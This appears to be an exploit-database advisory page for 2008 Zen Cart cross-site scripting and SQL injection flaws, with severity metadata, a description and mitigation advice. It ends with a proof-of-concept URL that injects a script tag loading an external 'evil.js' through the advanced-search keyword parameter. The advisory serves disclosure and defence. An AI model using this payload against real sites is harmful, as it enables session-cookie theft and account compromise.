header-logo
Suggest Exploit
vendor:
Zen Cart
by:
SecurityFocus
8.8
CVSS
HIGH
Cross-Site Scripting and SQL Injection
79 (Cross-Site Scripting) and 89 (SQL Injection)
CWE
Product Name: Zen Cart
Affected Version From: 2008
Affected Version To: 2008
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Zen Cart Cross-Site Scripting and SQL Injection Vulnerabilities

Zen Cart is prone to a cross-site scripting vulnerability and an SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to dynamically generate SQL queries. Additionally, the application should use parameterized queries to prevent SQL injection attacks.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/29020/info
 
Zen Cart is prone to a cross-site scripting vulnerability and an SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied input.
 
Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
 
Zen Cart 2008 is vulnerable; other versions may also be affected.

http://www.example.com/ZenCart/index.php?main_page=advanced_search_result&search_in_description=1&zenid=bla&keyword=><script src=http://site/scripts/evil.js></script>